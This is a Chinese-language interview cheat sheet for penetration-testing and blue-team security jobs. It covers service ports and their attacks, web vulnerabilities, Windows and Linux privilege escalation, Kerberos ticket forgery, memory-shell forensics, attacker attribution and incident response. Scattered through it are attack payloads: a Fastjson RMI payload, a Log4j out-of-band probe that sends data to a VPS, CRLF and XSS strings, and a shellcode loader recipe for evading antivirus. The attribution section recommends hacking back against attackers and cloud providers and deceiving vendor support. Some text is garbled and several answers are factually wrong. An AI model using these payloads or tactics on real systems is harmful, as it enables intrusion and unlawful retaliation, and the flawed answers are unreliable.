渗透相关面试＋流量分析

---

简单自我介绍

面试官您好，我是陆承威。熟悉常见的TOP10漏洞，有一定基本漏洞扫描和渗透能力 ,日志分析以及安全设备告警分析,能看懂安全产品，然后在校期间也是参加过项目研发的。

上一个工作的主要内容

答：主要是进行监测和辅助队友进行一个研判分析，同时负责总结，汇报情况，并申请采取对相应机器进行隔离。

Hvv的分组和流程

HW分为蓝队和红队，红队为常说的攻击队，蓝队为防守队。蓝队一般分为初级监测组，中级研判组，高级应急溯源组；

流程介绍：一般开始前会进行资产梳理，并通过漏洞扫描，渗透测试以及基线检查等做一些自查，一是可以减少暴漏面，二是减少一些风险点。有些厂商还会利用几天的时间进行一次内部演练，及时发现疏忽处并进行相应整改；

作为一个新手小白，主要做的就是坚守岗位，监测与甲方合作的安全厂商的一些监测设备，进行日志分析、IP封堵等，其实这些都没有什么技术含量，懂web安全和渗透测试基础的基本一看就会熟悉了，当然，部分厂商会对自己的合作伙伴们进行短期的产品培训。

你在hvv/攻防演练中取得了哪些成绩？

答：这是第二次参加国家级护网，一共阻断超3000个恶意IP；应急多起蠕虫病毒告警

二、渗透相关面试题

基础端口号以及入侵方式

ftp文件传输协议：21，弱口令，匿名登陆
rdp端口：3389，远程代码执行
ssh端口：22，命令注入漏洞
telnet远程连接服务：23，弱口令，暴力破解，提权
smtp邮件协议：25，邮件伪造
pop3协议：110，弱口令
http、https服务：80，443，常见的web攻击
snmp协议：161，爆破
ldap目录访问协议：389，未授权访问，爆破
smb协议：445，永恒之蓝，永恒之黑
rsync应用程序linux：873，未授权访问
mysql：3306，爆破，注入
SQL server：1433，爆破，注入攻击
oracle：1521，爆破，注入攻击
redis：6379，弱口令，未授权访问   连接命令redis-cli
postgresql：5432，注入，爆破
mongodb：27017，爆破，未授权
nfs协议：2049，未授权访问
zookeeper组件：2181，未授权访问
docker：容器，未授权访问，docker逃逸
zebra路由协议套件：弱口令，信息泄露
squid代理服务器软件：3128，远程命令执行
svn版本控制系统：3690，信息泄露，远程代码执行
rundeck服务平台：4440，跨站请求伪造。
vnc远程桌面共享协议：5900，弱口令，未授权
couchdb数据库：5984，任意命令执行漏洞，越权
weblogic中间件：7001，反序列化，任意文件上传，未授权
zabbix网络监控工具：10050，代码执行，登陆绕过
tomcat中间件：8080，远程代码执行，反序列化，弱口令
jboss中间件：8080，反序列化，未授权
jetty中间件：8080、8443，敏感信息泄露
jenkins中间件：8080，反序列化，远程代码执行，信息泄露
apache activemq后台服务：开源信息代理，用于实现消息传递模式。远程代码执行
fastcgi框架：未授权，ssrf
Hadoop框架：未授权，远程代码执行
elasticsearch监听端口：是一个搜索引擎 9200，未授权访问，命令执行，目录穿越
webmin-web控制面板：系统管理工具，管理unix系统web界面控制面板。远程命令执行
memcached监听端口：是一个内存缓存软件。11211，未授权，命令执行

OSI七层协议

物理层
数据链路层
网络层
传输层
会话层 
表示层 
应用层

响应状态码都有哪些？

• 404：404 状态码表示请求资源不存在，即表示攻击失败；
• **200：200 状态码表示请求成功，但是请求成功并不代表攻击成功，具体需要结合请求与 响应进行判断；如下图攻击中，攻击者尝试利用 Struts2 远程代码执行漏洞（S2-045）对目标 系统进行攻击，响应状态码为 200。该漏洞攻击载荷在 HTTP 请求头部的 Content-Type，分 析该攻击载荷，如果漏洞存在的话会在响应的头部添加 testvuln 字段，值为 1234x1234 即 1522756。分析响应的头部，并未发现存在 testvuln 字段，因此研判该漏洞攻击未成功。
• 401：401 状态表示未授权状态。该状态码返回常见于 HTTP 的 Basic 认证。
• 500：500 状态码表示服务器内部错误，通常漏洞攻击也会导致出现 500 错误，但是出现 500 错误并不表示攻击失败，需要根据实际情况研判。
• 301：本状态码将浏览器【永久重定向】到另外一个在Location消息头中指定的URL。以后客户端应使用新URL替换原始URL。
• 302：本状态码将浏览器【暂时重定向】到另外一个在Location消息头中指定的URL.客户端应在随后的请求中恢复使用原始URL.

WAF和IPS的区别

答：IPS位于防火墙和网络的设备之间，防火墙可以拦截底层攻击行为，但对应用层 的深层攻击行为无能为力。IPS是对防火墙的补充。综合能力更强一些；WAF是工作在应用层的防火墙，主要对web请求/响应进行防护。

盲注是什么？

就是你在测试注入数据库的时候，数据库没有任何回显，只显示对错。

java内存马类型

filter listener servlet websocket javaagent

内存马有几种类型

内存马是一种在受感染的主机内存中运行的恶意软件。一般来说，内存马可以分为以下几种类型：
注入型内存马：通过利用漏洞将恶意代码注入到正常进程中，从而在内存中运行。
自执行型内存马：将恶意代码写入自启动项，启动后自动运行。
进程注入型内存马：利用进程注入技术，在受感染进程的内存中运行恶意代码。
Hook型内存马：利用Windows API的Hook机制，修改进程中的关键函数，从而运行恶意代码。
要判断内存马的类型，可以使用反病毒软件或专门的安全工具对受感染主机进行扫描和分析。一般来说，不同类型的内存马会留下不同的痕迹和特征，比如某些进程的不正常行为、异常的网络连接等等。
针对不同类型的内存马，处理方法也会有所不同。一般来说，可以采取以下措施：
注入型内存马：修复漏洞、升级软件，加强网络安全防护等方法来预防类似攻击；对已经感染的主机，可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
自执行型内存马：可以通过清理自启动项、卸载恶意程序等方式来清除内存马。
进程注入型内存马：可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
Hook型内存马：可以通过还原Hook、修复关键函数、杀掉受感染进程或卸载恶意程序等方式来清除内存马。

shiro反序列化漏洞原理？

浏览器或服务器重启后用户不丢失登录状态，Shiro 支持将持久化信息序列化并加密后保存在 Cookie 的 rememberMe 字段中，下次读取时进行解密再反序列化。但是在 Shiro 1.2.4 版本之前内置了一个默认且固定的加密 Key导致攻击者可以伪造任意的 rememberMe Cookie，进而触发反序列化漏洞

Apache Shiro框架提供了记住密码的功能（RememberMe），用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值，先base64解码然后AES解密再反序列化，就导致了反序列化RCE漏洞那么，Payload产生的过程： 命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值在整个漏洞利用过程中，比较重要的是AES加密的密钥如果没有修改默认的密钥那么就很容易就知道密钥了

Apache Log4j2 远程代码执行漏洞原理？

Apache Log4j2 框架中存在一个名为 JNDI Lookup 的功能，它允许通过配置文件中的 JNDI 名称引用外部资源。攻击者构造一个特殊的日志消息，其中包含恶意的 JNDI 名称，并通过网络发送给受影响的应用程序。当应用程序使用 Log4j2 框架解析日志消息时，它会尝试查找和引用该 JNDI 名称。如果恶意的 JNDI 名称指向一个恶意的远程资源，例如恶意的 LDAP 服务器或 RMI 服务，攻击者可以控制该远程资源的内容和行为。攻击者可以在恶意的远程资源中注入恶意代码，并在目标系统上执行任意命令或获取敏感信息。

bp怎么隐藏不让对方发现

1. 代理设置-其他设置-禁用http://brup…
2. 代理设置-其他设置-忽略brup错误

为什么aspx的权限会比asp的权限更高

ASPX 和 ASP 都是用于创建动态Web页面的技术，但它们的实现方式略有不同。
ASP 是经典的ASP技术，它使用VBScript或JScript等脚本语言创建动态Web页面。在ASP中，权限控制是通过服务器操作系统的权限机制实现的。
而ASPX是ASP.NET技术中的一部分，它使用C#、VB.NET等编程语言创建Web页面。在ASP.NET中，权限控制是通过.NET框架提供的安全机制实现的。这些机制包括代码访问安全性、角色管理和基于表单的身份验证等。
因此，ASPX的权限控制比ASP更高，因为它基于.NET框架提供的安全机制，这些机制比操作系统的权限机制更强大和灵活。此外，ASPX还提供了更多的安全选项，例如加密会话状态和防止跨站点脚本攻击等。

Windows和Linux利用REDIS有什么不一样

redis是一个非关系型数据库，使用的默认端口是6379。常见的漏洞是未授权访问漏洞，攻击者无需认证就可以访问内部数据。
性能：Redis在Linux上运行的性能通常比在Windows上运行的性能更好，这是由于Linux系统的设计和优化使得其能够更好地利用系统资源。
可用性：在Windows上运行Redis时，其可用性通常会受到操作系统的限制，例如系统的最大打开文件数和最大连接数等。而在Linux上，这些限制通常可以通过修改系统配置文件来解决。
安全性：Redis的安全性与其在Windows或Linux上运行的方式无关，但是在实践中，由于Windows和Linux的不同权限模型和安全机制，使用Redis时需要采取不同的安全措施。例如，在Linux上，可以使用文件系统权限和防火墙规则来保护Redis服务器，而在Windows上，需要使用Windows防火墙和用户权限来保护Redis服务器。

CRLF注入

Nginx中常见的中间件漏洞；
CRLF注入（也称为HTTP头注入）是一种攻击技术，攻击者通过注入CRLF字符序列（即回车换行）来改变HTTP头部的内容，从而实现各种攻击目的，例如HTTP响应拆分、HTTP重定向、会话劫持等。
攻击者通常会将CRLF字符序列注入到HTTP请求或响应的参数中，例如Cookie、User-Agent、Referer等。在受害者的Web应用程序中，如果没有对这些参数进行有效的输入验证和过滤，那么CRLF字符序列就会被当作有效的HTTP头部分隔符，并导致HTTP头部的内容被注入。
例如，攻击者可以将以下内容作为User-Agent参数发送给Web应用程序：
User-Agent: <script>alert('CRLF Injection')</script>\r\n\r\nHTTP/1.1 200 OK
在这个例子中，攻击者在User-Agent参数中注入了CRLF字符序列，以便将HTTP响应头部分隔为两个部分。第一个部分是攻击者自己构造的HTTP响应头部分，第二个部分则是Web应用程序返回的HTTP响应体。
如果Web应用程序没有对这个User-Agent参数进行有效的输入验证和过滤，那么攻击者就可以成功地将自己构造的HTTP响应头部发送给受害者浏览器，从而实现各种攻击目的。例如，攻击者可以在自己构造的HTTP响应头中设置Location字段，将用户重定向到恶意站点，从而实现HTTP重定向攻击。或者攻击者可以在自己构造的HTTP响应头中设置Set-Cookie字段，从而实现会话劫持攻击。
为了防止CRLF注入攻击，Web应用程序应该对所有HTTP请求和响应参数进行有效的输入验证和过滤，包括Cookie、User-Agent、Referer等。在输入验证和过滤时，应该使用白名单过滤的原则，只允许合法的字符集通过，而拒绝所有不合法的字符。同时，Web应用程序应该使用最新的安全框架和库来保护自己，以及及时更新系统和软件的安全补丁。

反弹shell的原理是什么

利用TCP协议传了一个bash环境

文件上传怎么绕过

因为是黑盒测试，你不知道它的检测规则是怎么样的，看看对哪方面做了检测，有可能只是前端检测，再针对的去绕过，一般的话我先根据后端语言去跑一遍后缀名字典，然后去尝试各种方法，例如变换大小写，插入各种特殊字符像%00、单引号、换行符，去构造一些畸形的数据包

csrf跟ssrf区别

CSRF (Cross-site request forgery)跨站请求伪造SSRF (Server-Side Request Forgery)服务器端请求伪造csrf 一个是客户端发起，ssrf是从服务端发起的

SSRF用哪些协议、函数，怎么绕过，修复

file、dict、ldap、gopher，可以利用curl函数、file_get_contents()函数、fsockopen()
绕过：使用短网址、进制转换、302跳转、DNS重绑
修复：禁止不需要的协议、设置URL白名单、统一返回信息、限制请求的端口

xss可以使用哪些标签

这个太多了，常用的就
<script><a<iframe<EMBED<svg<body <object<form<img

XSS弹窗函数和常见的XSS绕过策略？

• **弹窗函数：**alert、confirm、prompt、onclick
• **绕过策略：**大小写混写；双写；<img/src=1>；%0a或者%0d绕过；拼凑绕过

Mssql xp_cmdshell被禁用了怎么办

先看看能不能手动启用，不能的话看看有没有其他的扩展存储可以利用，有的可以执行系统命令，记得有的可以直接操作注册表，也可以利用CLR技术，类似于mysql中的UDF吧，可以直接使用16进制代码来创建自定义函数

XXE中PCDATA和CDATA有什么区别

PCDATA就是被解析的字符数据，会被解析，CDATA属于不会被解析器解析的文本

了解哪些中间件漏洞

IIS有解析漏洞，PUT任意文件写入漏洞，短文件漏洞，Apache也有解析漏洞，然后目录遍历遇到的比较多，Tomcat的话war后门部署、远程代码执行，jBoss和WebLogic的话就反序列化漏洞，weblogic还有ssrf漏洞，任意文件上传

Kali工具使用

wireshark

Burpsuite等工具抓包

开代理，将关键数据send to repeater,修改

报错注入的原理是什么？

在MYSQL中使用一些指定的函数来人为制造报错，后台没有屏蔽数据库报错信息， 在语法发生错误使得查询结果能够出现在错误信息中回显在前端，从而从报错信息中获取设定的信息。

Webshell是什么，原理是什么

WebShell就是一句话木马，由于脚本语言的动态性，木马文件通过命令执行system函数或者代码执行eval函数等，参数为用户外部传入（如GET传参，POST传参）达到执行任意代码任意命令的功能。从而远程控制目标主机

常用的Webshell管理工具

冰蝎，蚁剑，哥斯拉，菜刀

冰蝎和菜刀等webshell工具有什么区别？

答：冰蝎有流量动态加密

Redis未授权有了解吗

答：有，可以配合ssrf打组合拳

Springboot 有哪些漏洞？

答：只知道一个snakeyaml

常见的网络服务器容器

IIS、Apache、nginx、Lighttpd、Tomcat 

### 序列化与反序列化的区别

序列化：把对象转化为可传输的字节序列过程称为序列化
反序列化：把字节序列还原为对象的过程称为反序列化

### 正向SHELL和反向SHELL的区别

正向shell，攻击者连接被攻击者机器反向shell，被攻击者主动连接攻击者正向代理，客户端代理，服务器不知道实际发起请求的客户端反向代理，服务器代理，客户端不知道实际提供服务的服务端

### xxe原理与攻击手法答：解析XML输入时可以加载外部实体类，造成文件读取，命令执行等危害。直接dtd加载dnslog等等### xss除了获取cookie还能干什么答：用户劫持、结合csrf补充：貌似能提权？### ssrf的原理与危害？答：伪造服务器给内网发消息### ssrf和csrf有什么区别？答：csrf伪造客户端，ssrf伪造服务器端### 如何寻找注入点答：字符，数字，盲注…### 有用过sql注入传马吗答：用过into outfile补充：可以通过日志文件写入木马### –os-shell的条件答：拥有网站的写入条件补充：Secure_file_priv参数为空或者为指定路径。### 内存马免杀有做过吗？具体说说答：没做过，在网上找现成的补充：Filter名称是否合理Filter对应的类名是否合理Filter对应的类是否在classpath下网站web.xml中是否存在改filter### 不借助dnslog有办法检测log4j2是否出网吗答：dns到vps判断是否出网补充：使用logg.error(“KaTeX parse error: Expected ‘}’, got ‘EOF’ at end of input: …s://xxxxx:8090/{java:version}}”);在自己的VPS上nc -luvvp 8090即可收到信息### 你是如何验证struts2是否存在的答：检测工具，或者抓包，改post，把content-Type改为application/xml,放上payload### 数据库有哪些，关系型的和非关系型的分别是哪些

关系型

MySQL：3306

SQL Server：1433

Oracle：1521

DB2：5000

MongoDB：27017

非关系型

Redis：6379

Memcached：11211

PHP反序列化

### PHP代码执行的危险函数

call_user_func()
call_user_func_array()
create_function()
array_map()

### PHP命令执行函数

system
shell_exec
passthru
exec
popen
proc_open
putenv
assert

### linux和windows怎么判断linux大小写敏感### 什么是免杀将shellcode进行加密，动态解密恢复，申请可写可执行内存并写入解密后的shellcode，将函数指针指向这块内存的起始位置并开始执行。### 免杀有几种途径？答：修改特征码、流量混淆、花指令、加壳### Java常见的框架中间件及漏洞#### struct2框架

一个基于MVC设计模式的Web应用框架)这个框架全是漏洞

#### fastjson框架阿里巴巴开源的JSON工具解析库1.2.47版本前存在反序列化漏洞框架特征：post数据包，content-type为application/json, post内容为json数据，且其中有@type标识比如

{ “a”:{ “@type”:“java.lang.Class”, “val”:“com.sun.rowset.JdbcRowSetImpl” }, “b”:{ “@type”:“com.sun.rowset.JdbcRowSetImpl”, “dataSourceName”:“rmi://127.0.0.1:1099/Exploit”, “autoCommit”:true }}

#### shiro框架apache的一个权限管理的开源框架,实现 用户认证、用户授权。若shiro框架服务端使用默认密钥，则会存在反序列化漏洞框架特征：cookie字段为存在rememberMe=xxxxx;#### weblogic容器一个基于JAVAEE架构的中间件weblogic存在许多漏洞，弱口令，SSRF，反序列化，任意文件上传，XMLDecoder反序列化框架特征，一般在7001端口，漏洞检测常用工具#### tomcat容器最常见的java web容器漏洞，弱口令，幽灵猫，PUT方法任意写文件框架特征，一般为8080端口### 云函数了解吗，怎么防御1. C2客户端发出的流量经过云函数转发到达C2服务器，因为云函数的服务器是自带CDN的，从而达到隐藏的效果。
2. 封禁域名**apigw.tencentcs.com**# 四、内网相关面试题### Windows和Linux提权的方法1. Windows：内核漏洞、可修改的服务、服务路径缺陷、可修改的计划任务、psexec、bybassuac
2. Linux：suid、定时任务、内核漏洞、sudoer### Windows系统提权的思路提权可分为纵向提权与横向提权：纵向提权：低权限角色获得高权限角色的权限；横向提权：获取同级别角色的权限。

方法： 1.系统内核溢出漏洞提权 2.数据库提权 3.错误的系统配置提权 4.组策略首选项提权 5.WEB中间件漏洞提权 6.DLL劫持提权 7.滥用高危权限令牌提权 8.第三方软件/服务提权等

### Linux有哪些提权思路常用的就内核提权、sudo滥用提权、suid提权、一些高权限运行的应用服务提权，例如mysql、python、vi、定时任务提权、etc/passwd滥用提权

方法：1.Linux内核漏洞提权2.低权限用户目录下可被Root权限用户调用的脚本提权（SUID）3.环境变量劫持高权限程序提权4.sudoer配置文件错误提权

### **说一下Linux利用passwd提权**这个需要对passwd有写入权限，正常root用户的uid为0，如果自己写进去一个用户把它的uid改为0的话，用这个用户登录，系统就会切到root用户了### suid提权的原理通过文件属主的身份运行文件### bypassuac的方法白名单、COM 接口、Shell API，也可以通过工具UACME### 黄金白银票据1. 黄金票证是一种权限维持手段，攻击者获得了对 AD 密钥分发服务帐户的控制权，并使用该帐户伪造 TGT，便能够访问 域上的任何资源。
2. 白银票据是伪造的 TGS 票证，白银票仅允许攻击者伪造特定服务的 TGS 票据。### 详细讲一下金票以及需要的信息AS认证中返回的TGT是由krbtgt用户的密码Hash加密的，有krbtgt的密码hash就可以自己制作任意的TGT
需要域名、域SID、要模拟的用户名、krbtgt的hash### 读hash读取不到怎么办用工具把lsass进程dump下来，然后本地去读，或者转储sam文件，AD数据库的话可以用dcsync的方式转出来### dcsync的利用条件

需要配置两个ACL的权限就可以了

### 详细讲一下ACLACL就是访问权限，windows下不同的用户组有默认的ACL配置，你也可以单独添加权限，这样就算普通用户也可以给他添加向域管组添加用户的权限### psexec和wmic区别psexec会有大量的日志，wmic就不会### **PTT有哪些攻击方法**MS14-068、金票、银票### 内网扫描的方式内网fscan扫描 或者 搭建内网socks5代理然后走代理进行扫描### **Liunx系统中任何权限都能访问的临时文件位置**答：/var/tmp### **正向代理 反向代理的区别啊**正向代理和反向代理是两种不同的代理服务器架构。
正向代理（Forward Proxy）是代理服务器位于客户端与目标服务器之间的一种代理方式。客户端发送请求时，先将请求发送到代理服务器，然后代理服务器再将请求发送到目标服务器。在这个过程中，客户端并不知道请求是由代理服务器发出的，只知道代理服务器的地址。正向代理常用于客户端无法直接访问目标服务器的情况下，比如防火墙的限制、访问限制等。
反向代理（Reverse Proxy）是代理服务器位于目标服务器与客户端之间的一种代理方式。客户端发送请求时，请求先到达反向代理服务器，然后由反向代理服务器将请求转发到目标服务器，目标服务器将响应发送给反向代理服务器，最后再由反向代理服务器将响应发送给客户端。在这个过程中，客户端不知道请求是由目标服务器响应的，只知道反向代理服务器的地址。反向代理常用于负载均衡、缓存、安全等方面。
在实际应用中，常常使用反向代理作为Web服务器的入口，来处理负载均衡、安全过滤、缓存等问题；同时使用正向代理来提高用户体验，隐藏客户端真实IP地址，保护隐私等# 五、应急响应面试题## 1.内存马应急(重点)### **内存马有几种类型**内存马是一种在受感染的主机内存中运行的恶意软件。一般来说，内存马可以分为以下几种类型：
注入型内存马：通过利用漏洞将恶意代码注入到正常进程中，从而在内存中运行。
自执行型内存马：将恶意代码写入自启动项，启动后自动运行。
进程注入型内存马：利用进程注入技术，在受感染进程的内存中运行恶意代码。
Hook型内存马：利用Windows API的Hook机制，修改进程中的关键函数，从而运行恶意代码。
要判断内存马的类型，可以使用反病毒软件或专门的安全工具对受感染主机进行扫描和分析。一般来说，不同类型的内存马会留下不同的痕迹和特征，比如某些进程的不正常行为、异常的网络连接等等。
针对不同类型的内存马，处理方法也会有所不同。一般来说，可以采取以下措施：
注入型内存马：修复漏洞、升级软件，加强网络安全防护等方法来预防类似攻击；对已经感染的主机，可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
自执行型内存马：可以通过清理自启动项、卸载恶意程序等方式来清除内存马。
进程注入型内存马：可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
Hook型内存马：可以通过还原Hook、修复关键函数、杀掉受感染进程或卸载恶意程序等方式来清除内存马。### 内存马你怎么查杀**内存马如何排查：如果发现了一些内存webshell的痕迹，需要有一个排查的思路来进行跟踪和分析，也是根据各类型的原理，
列出一个排查思路——1、如果是jsp注入，日志中排查可以jsp的访问请求。
2、如果是代码执行漏洞，排查中间件的error.log,查看是否有可疑的报错，判断注入时间和方法。
3、根据业务使用的组件排查可能存在的java代码执行漏洞，spring的controller了类型的话根据上报webshell的url查找日志，filter或者listener类型，可能会有较多的404但是带有参数的请求。
杀马：
终止进程：如果确认某个进程是内存马，可以尝试终止该进程。在Windows系统中，可以通过任务管理器或者命令行工具taskkill来终止进程；在Linux系统中，可以通过命令行工具kill或者pkill来终止进程。
删除文件：如果进程终止后，还需要删除相关的文件，以防止内存马重新启动。在Windows系统中，可以直接删除相关文件；在Linux系统中，需要先终止进程，然后再删除文件。### **怎么排查java内存马**直接利用内存马检测工具去找，github也有很多检测脚本，手工的话可以分析web日志，filter或者listener类型的内存马，会有大量路径相同参数不同的url请求，或者页面不存在但是返回200的请求，分析web.xml文件，内存马的Filter是动态注册的，web.xml是没有配置的，也有可能是中间件漏洞通过代码执行加载内存马，这就可以去排查中间件的错误日志，像哥斯拉和冰蝎的内存马也会有跟webshell相似的特征，分析特殊的classloader加载，攻击者喜欢利用TemplatesImpl和bcel加载内存马，因为内存马是驻留在内存里的，本地无class文件，通过检测Filter对应的ClassLoader目录下是否存在class文件来判断，也可以把内存中所有的Filter的class dump出来，使用工具分析是否存在恶意代码## 2.溯源### 溯源反制1. 通过 ip 定位物理位置，对 ip 进行端口扫描，进行反渗透
2. 通过社交 ID 进行追踪
3. 通过 ip 查域名、查邮箱、电话，对域名进行溯源分析
4. 如果有恶意样本，可通过分析恶意样本，看是否存在攻击者信息
5. 通过蜜罐进行反制
6. 也可以进行反钓鱼## **溯源有哪些思路**通过分析设备的告警、钓鱼邮件、木马病毒找到攻击者IP，先去一些威胁情报平台搜索相关信息，判断攻击者为代理服务器还是跳板机还是国内的云服务器，查一查相关注册信息，对攻击者进行反向渗透，针对攻击者去搭建蜜罐，如果是云服务器，可以寻找到相关厂商，联系客服说自己忘记密码了，看看能不能获取到云服务器购买者信息，对于获取到的信息可以通过各种社工库搜一搜，各大搜索引擎去搜索看看能不能获取到更多信息，也可以直接把服务器厂商打下来，肯定就可以知道购买者的信息了，如果把跳板机拿下就可以去查看桌面的敏感信息，登录日志，历史执行命令这样一步一步去获取更多的信息。### 你会用什么办法溯源攻击方的个人信息呢1. 首先通过日志和蜜罐等方式获取到攻击方的 ip，可以对 ip 进行反向渗透获取信息，定位攻击者信息。
2. 也可以通过搜索引擎或者安全情报，获取 ip 对应攻击者的网名id，再通过社交平台获取攻击者的信息
3. 通过攻击 IP 历史解析记录/域名，对域名注册信息进行溯源分析
4. 如果攻击者有种植木马等，可以提取样本特征如用户名、ID、邮箱、C2 服务器等信息—同源分析
5. 搭载 jsonp 钓鱼的蜜罐，通过 JSONP 跨域，获取攻击者的主机信息、浏览器信息、真实 IP 及社交信息等### **怎么做溯源，国外ip怎么溯源，国内ip怎么溯源**溯源思路：首先通过系统日志、安全设备截获攻击包等从中分析出攻击者的ip和攻击方式，通过webshell或者木马去微步分析，
或者去安恒威胁情报中心进行ip检测分析，是不是云服务器，基站等，如果是云服务器的话可以直接反渗透，看看开放端口，域名，whois等进行判断，
获取姓名电话等丢社工库看看能不能找到更多信息然后收工
针对国外IP的溯源方法：
使用网络安全工具进行溯源：可以使用网络安全工具，如traceroute、ping等命令，对目标IP进行探测和跟踪。这些工具可以显示出攻击流量经过的路由器、网关和ISP等信息，帮助我们了解攻击流量的来源地点。
查找域名信息：通过WHOIS查询工具查询目标域名的注册信息，包括注册人、注册机构、联系方式等信息，可以从中了解到攻击来源的大致位置。
联系当地ISP：如果攻击者使用的是公共网络，如酒店、咖啡厅、机场等，可以联系当地ISP，寻求协助获取攻击来源的信息。### **针对国内IP的溯源方法：**使用网络安全工具进行溯源：同样可以使用traceroute、ping等命令进行溯源，显示攻击流量经过的路由器和ISP等信息，帮助我们确定攻击来源的大致位置。
查找公网IP地址：通过IP地址查询工具查询目标IP的公网IP地址，可以从中了解到攻击来源的大致位置。
联系当地ISP：如果攻击者使用的是公共网络，如网吧、公共WiFi等，可以联系当地ISP，寻求协助获取攻击来源的信息。### **有没有接触过溯源反制啊**溯源反制的原理主要是通过混淆和伪装攻击流量，防止攻击者获取真实的攻击来源和行为信息。具体操作包括：
使用代理服务器：通过使用代理服务器，可以改变攻击流量的来源IP地址，使得攻击者无法追踪真实的攻击来源。
使用VPN技术：VPN技术可以在公网上建立一个私有网络，加密传输数据流量，从而防止攻击者获取敏感信息。
使用匿名浏览器：匿名浏览器可以隐藏用户真实的IP地址和浏览痕迹，使得攻击者无法追踪用户的真实身份和行为。
使用虚假数据：在攻击流量中混入虚假的数据，如虚假的IP地址、协议和端口等信息，可以混淆攻击者的追踪。### **已知攻击者IP，如何溯源定位攻击人员？**

1、IP反查注册信息，可能会查询到域名，通过域名查询备案和whois信息，可能会查出邮箱电话，通过社工库查询相关邮箱和电话信息定位人员支付宝，微信转账；微博，百度贴吧等
2、通过白泽系统查询IP标记情况，查看攻击者IP日常访问数据内容，判断攻击者人员信息

### **溯源会用些什么工具或者在线网站，都可以说说常用的服务和对应的端口**查入侵IP，入侵手法（网路攻击事件）的确定等
工具：可以用wireshark进行溯源取证；
Wireshark：Wireshark 是一款免费开源的网络协议分析工具，可以捕获和分析网络数据包。通过使用 Wireshark，您可以追踪网络数据流和操作记录，了解数据的来源、目的和内容等信息。 Sysinternals Suite：Sysinternals Suite 是一组 Windows 系统工具集合，其中包括了很多用于溯源的工具。例如，Process Monitor 可以监视 Windows 系统中的进程和操作记录，用于追踪应用程序和系统资源的使用情况；Regmon 可以监视系统注册表的操作记录，用于追踪应用程序对系统注册表的读写操作。 SIFT：SIFT（SANS Investigative Forensic Toolkit）是一款专业的数字取证工具集，用于支持取证人员对数字媒体进行取证分析。SIFT 包含了很多工具，例如，Autopsy 可以分析磁盘映像文件，Volatility 可以分析内存映像文件，用于追踪系统的操作记录和数据流。 Sleuth Kit：Sleuth Kit 是一款开源的数字取证工具集，提供了一系列用于分析文件系统和磁盘映像文件的工具。例如，fls 工具可以分析文件系统中的文件记录，用于追踪文件的创建、修改和删除记录；mactime 工具可以分析文件系统中的时间戳记录，用于追踪文件的时间戳信息。 在线网站：微步* 安恒威胁情报中心 全国互联网违法和不良信息举报中心 工业和信息化部网络安全管理局
溯源思路：首先通过系统日志、安全设备截获攻击包等从中分析出攻击者的ip和攻击方式，通过webshell或者木马去微步分析，
或者去安恒威胁情报中心进行ip检测分析，是不是云服务器，基站等，如果是云服务器的话可以直接反渗透，看看开放端口，域名，whois等进行判断，
获取姓名电话等丢社工库看看能不能找到更多信息然后收工## **应急响应要干什么啊**应急响应通常包括以下步骤：
确认安全事件：要及时发现安全事件，快速确认其类型、范围和危害程度，并进行预警和通报。
切断攻击链：要采取有效措施，尽可能快地切断攻击链，阻止攻击扩散和进一步损失。
收集证据：要收集、保留安全事件相关的证据和信息，以便后续的调查和追踪。
分析病毒特征：要对病毒、木马等安全事件的特征进行分析，找出其入侵方式、攻击目的、传播途径等信息，以便防止类似安全事件的再次发生。
应对措施：根据安全事件的类型和程度，采取相应的应对措施，如修补漏洞、清除恶意软件、升级补丁、修改配置等。
恢复业务：在限制损失和消除安全风险的基础上，尽快恢复业务，保障用户和业务的正常运转。
事件总结：要对安全事件的应急响应过程进行总结和反思，发现问题并进行改进，提高应急响应能力。
常见的应急响应事件分类：web入侵：网页挂马、主页篡改、Webshell 系统入侵：病毒木马、勒索软件、远控后门 网络攻击：DDOS攻击、DNS劫持、ARP欺骗 网站被挂马如何应急（具体流程都是差不多的，看着变）
1.取证，登录服务器，备份，检查服务器敏感目录，查毒（搜索后门文件-注意文件的时间， 用户，后缀等属性），调取日志（系统，中间件日志，WAF日志等）；
2.处理，恢复备份（快照回滚最近一次），确定入侵方法（漏洞检测并进行修复）
3.溯源，查入侵IP，入侵手法（网路攻击事件）的确定等
4.记录，归档--------预防-事件检测-抑制-根除-恢复-跟踪-记录通用漏洞的应对等其他 安全应急事件 判断威胁情报是否有误，就看wireshark，进行流量分析判断是否为正常业务操作## **应急响应流程**收集信息：收集告警信息、客户反馈信息、设备主机信息等
判断类型：判断攻击的类型，是ddos还是被挂马了还是被控制了
控制范围：隔离目标网络不让危害扩大
寻找原因：还原攻击者的攻击链，溯源攻击者的整个过程
修复防御：直接封掉攻击者ip，对于产生的原因进行对应防御
恢复业务：将业务恢复正常
写报告：总结整个过程，反思不足之处，优化应急方案## 安全设备发现一台Linux主机触发挖矿告警，上机排查该机器执行ps，top命令未发现挖矿及恶意进程，现在怀疑ps，top命令被替换，动态链接库被劫持，请问应该如何处理？**

1、使用cat /etc/ld.so.preload命令查看动态链接库文件是否加载有so文件，提取加载的so文件上传至威胁情报平台，判断是否为恶意so文件2、清除so文件，使用ldconfig命令重新加载动态链接库，执行ps，top命令查看是否可以发现挖矿进程信息
3. 确认ps和top命令是否被替换：可以使用命令"which ps"和"which top"查看这两个命令的路径是否为系统默认路径"/bin/ps"和"/usr/bin/top"，如果不是则说明被替换。也可以通过比较ps和top命令的md5值来判断是否一致。2. 确认动态链接库是否被劫持：可以使用命令"ldd /bin/ps"和"ldd /usr/bin/top"查看这两个命令依赖的动态链接库是否正常，如果有动态链接库被替换，则会发现其中一些动态链接库路径不对
4. 恢复被替换的命令和动态链接库：如果确认被替换，可以从系统安装介质或官方网站上下载对应版本的ps和top命令和动态链接库，替换掉被替换的文件即可。
5. 检查系统安全：替换命令和动态链接库只是暂时的措施，需要进一步排查系统安全状况，比如查杀恶意程序、加强访问控制、更新系统补丁等，以防止类似问题再次发生
6. 借助工具busybox

## **如何分析排查钓鱼邮件事件？**

1.确认邮箱批量发送时间点
2.排查邮箱登录日志，发现【恶意IP】在【什么时间】通过web登录成功;
3.查看邮件内容，确认钓鱼邮件的影响和目的；
4.排查浏览器或上网行为，判断是否访问过钓鱼页面；
5.对访问过的设备进行全盘查杀

